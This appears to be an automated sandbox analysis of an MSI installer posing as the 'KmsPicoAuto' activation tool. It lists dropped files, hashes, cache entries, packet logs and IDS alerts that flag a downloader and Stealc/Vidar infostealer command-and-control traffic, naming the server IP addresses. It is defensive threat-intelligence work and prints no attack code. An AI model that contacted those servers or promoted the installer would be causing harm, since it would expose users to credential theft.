Size (bytes):	20480
Entropy (8bit):	1.5795687191313985
Encrypted:	false
SSDEEP:	48:f8PhvuRc06WXJ0FT5EncXyrdmKSkdm6VAEkrCyMMwoRdmKSkdmGvf7Eh:ehv13FTocXGHeRCQnTTE
MD5:	0A3FEC442616986A0C30E2D43B762988
SHA1:	79146E636AAE9A25B07EB141B5DB4E40B32CA9A7
SHA-256:	735790F69B7FFA228AAA05DFEDE9BC483EA51AA5569B9D73AE92D1BE30D0E7B3
SHA-512:	D036B6F06477EBE2E5380C042E4A0451A1E3636C199AA13450CC364F5FF911528E25A51104D9717761D3B6FDEA04213C500826A298257877A34E23C8FF7FE76C
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB82E99138836EDD9.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE65590B598F5265E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2640959585077476
Encrypted:	false
SSDEEP:	48:cs3uSO+CFXJpT5EjncXyrdmKSkdm6VAEkrCyMMwoRdmKSkdmGvf7Eh:J34RTu7cXGHeRCQnTTE
MD5:	80B840DCA3CF19EB2AD028B85C3CA3D2
SHA1:	D912D2B8EFEDFFE7EC1BBDD1434B44DAC874B7E7
SHA-256:	BF81A07B8B63D6AFBCDAEA5D2E0E076C34204C64E95C8CB9B0414ED18F1EFED0
SHA-512:	A1F626DBF5548984C1EE1D21CB56255B9A8941A7782F43404AA6D37328C8D875C837504D73EA21332CA12C5417C69E0471FFBB6682F39DDB514E85FE0B3D4A1D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (868)
Category:	downloaded
Size (bytes):	873
Entropy (8bit):	5.163020721822248
Encrypted:	false
SSDEEP:	24:buh5nrRmstMDBHslgT9lCuABATguoB7HHHHHHHYqmffffffo:ih1tMDKlgZ01BA0uSEqmffffffo
MD5:	D193F869C34543D7E9E68A45834B54CB
SHA1:	0C56A4625B29CD2BAEE48138AC062051B8B6160D
SHA-256:	C8CB6A41A18FC0C87B9E3D453B4FB08556DEE44915D10096320AACB8FEA25430
SHA-512:	8021FCDEA4E3724DC92C3EEE02495F0E5B4DE9DEC5B2E4E890BE9E12FC0BB5C69C3723603B4CEFC82411167725615A05E6ADDDE5B5DA526F204076ADB529D2D8
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["week 16 fantasy football rankings","canada postal workers strike","beyond the spider verse release date","elden ring ring nightreign","december full moon cold moon","nyt mini crossword clues","inter miami club america las vegas","t mobile starlink satellite beta test"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":3239920517839758227,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 122

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 123

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132970
Entropy (8bit):	5.435187744843128
Encrypted:	false
SSDEEP:	3072:flktv3zg+newH5FsYZGFsxIoFLe13y2i6o:fAvn/H/MFsxIoFY3y8o
MD5:	CF2C60D8E9F77C190BA0349465FA8B34
SHA1:	4BB0351B8273BD5FD63015E5D619B972FEDD7A45
SHA-256:	0C49A5C21554C3192409CA14696217EA6BFB0E1D313772279E3707B841358533
SHA-512:	C9C433120E2817DB24BFAD1DD542B4191557DE67CF376A39B936BC17964FDCBEDFCCA9FD273730ECA9A75589E240F1D1E3366BC766014C54E354CC36CD7E31E6
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {01A028B0-C5F4-4809-A85C-BD25D6968735}, Number of Words: 2, Subject: KmsPicoAuto, Author: SoftPortable, Name of Creating Application: KmsPicoAuto, Template: ;1033, Comments: This installer database contains the logic and data required to install KmsPicoAuto., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Dec 16 18:59:36 2024, Last Saved Time/Date: Mon Dec 16 18:59:36 2024, Last Printed: Mon Dec 16 18:59:36 2024, Number of Pages: 450
Entropy (8bit):	6.63599620874043
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	69633f.msi
File size:	2'098'688 bytes
MD5:	0ad499852cac6d4d76206e52bb6efb16
SHA1:	a258c40ef83001cf7a41dbe9d2c05001f31fea53
SHA256:	1ab415530ae51853cfdd8fb1c8c0c88001d7d6cdf88ab2cb8c146c88c191dfd0
SHA512:	5f75640514674c3efce1afcd42573191405166880ef5bfb75516b1b9b8093ff71052fa16662d4f90b57d69cd28ba0e807219d1dfc58bc4999dd7da30f1bd00e6
SSDEEP:	49152:l5MM8cU7Y4zGXknHeVdOEod5+1d7csiG/C:n4eYHeVdPod57
TLSH:	3DA5AE11B3CAC236E16E01BBE829EE0AE539BD63033081D763E6755E1E718C1577EB52
File Content Preview:	........................>...................!...................................E.......a.......n.......................................C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R..........................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T08:21:45.896786+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.7	49762	138.124.60.133	80	TCP
2024-12-17T08:22:55.217336+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.7	49913	116.203.12.114	443	TCP
2024-12-17T08:22:55.217547+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.12.114	443	192.168.2.7	49913	TCP
2024-12-17T08:22:57.499659+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.12.114	443	192.168.2.7	49918	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 08:21:06.408797979 CET	49675	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:06.408801079 CET	49674	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:06.533835888 CET	49672	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:10.190778017 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:21:10.565054893 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:21:11.315059900 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:21:12.814951897 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:21:15.799388885 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:21:16.024085045 CET	49675	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:16.024086952 CET	49674	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:16.143126965 CET	49672	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:19.215357065 CET	443	49699	104.98.116.138	192.168.2.7
Dec 17, 2024 08:21:19.216002941 CET	49699	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:21.752542019 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:21:27.248740911 CET	49699	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:27.251760006 CET	49717	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:27.251804113 CET	443	49717	104.98.116.138	192.168.2.7
Dec 17, 2024 08:21:27.251871109 CET	49717	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:27.281486988 CET	49717	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:21:27.281516075 CET	443	49717	104.98.116.138	192.168.2.7
Dec 17, 2024 08:21:27.368623018 CET	443	49699	104.98.116.138	192.168.2.7
Dec 17, 2024 08:21:33.783853054 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:21:44.574887037 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:44.695025921 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:44.697896957 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:44.698105097 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:44.817920923 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.896568060 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.896646976 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.896684885 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.896722078 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.896756887 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.896785975 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:45.896786928 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:45.896786928 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:45.896817923 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.896882057 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:45.896882057 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:45.896882057 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:45.896888971 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.896923065 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.896950006 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:45.896974087 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:45.896976948 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.897032976 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:45.897105932 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:45.897157907 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.017558098 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.017617941 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.017745972 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.021622896 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.021712065 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.088736057 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.088828087 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.089113951 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.089189053 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.092884064 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.092952013 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.093027115 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.093086958 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.101344109 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.101416111 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.101475000 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.101532936 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.109945059 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.110013962 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.110044003 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.110100985 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.118305922 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.118366003 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.118468046 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.118525028 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.126945019 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.127003908 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.127059937 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.127115011 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.135229111 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.135291100 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.135351896 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.135397911 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.143644094 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.143699884 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.143702984 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.143759012 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.152391911 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.152451992 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.152548075 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.152597904 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.159883976 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.159951925 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.160051107 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.160115004 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.167538881 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.167603970 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.193485022 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.193564892 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.193567991 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.193624973 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.208672047 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.208745003 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.280733109 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.280814886 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.280822992 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.280913115 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.283143997 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.283207893 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.283299923 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.283359051 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.288018942 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.288099051 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.288213968 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.288274050 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.292941093 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.293009043 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.293044090 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.293104887 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.297722101 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.297760010 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.297787905 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.297832012 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.302544117 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.302618980 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.302661896 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.302717924 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.307439089 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.307521105 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.307524920 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.307579041 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.312284946 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.312357903 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.312392950 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.312462091 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.317109108 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.317189932 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.317204952 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.317240953 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.321939945 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.321989059 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.322024107 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.322067022 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.326688051 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.326765060 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.326817989 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.326874018 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.331641912 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.331727028 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.331743002 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.331794024 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.336385012 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.336458921 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.336477995 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.336523056 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.341239929 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.341329098 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.341376066 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.341430902 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.344830990 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.344882011 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.344918013 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.344969988 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.348552942 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.348625898 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.348639011 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.348692894 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.352163076 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.352225065 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.352293015 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.352344990 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.355829954 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.355892897 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.355956078 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.356017113 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.359467983 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.359568119 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.359580040 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.359628916 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.363132000 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.363182068 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.363245010 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.363308907 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.366796970 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.366848946 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.366853952 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.366904974 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.400679111 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.400762081 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.400777102 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.400831938 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.402506113 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.402570009 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.402622938 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.402678967 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.406196117 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.406279087 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.472942114 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.473014116 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.473141909 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.473196983 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.474473000 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.474524021 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.474670887 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.474771976 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.477385998 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.477432966 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.477483988 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.477602959 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.480406046 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.480468988 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.480500937 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.480556011 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.483309984 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.483386993 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.483469963 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.483524084 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.486202955 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.486258984 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.486319065 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.486450911 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.489061117 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.489124060 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.489126921 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.489182949 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.491672993 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.491744041 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.491811991 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.491868019 CET	49762	80	192.168.2.7	138.124.60.133
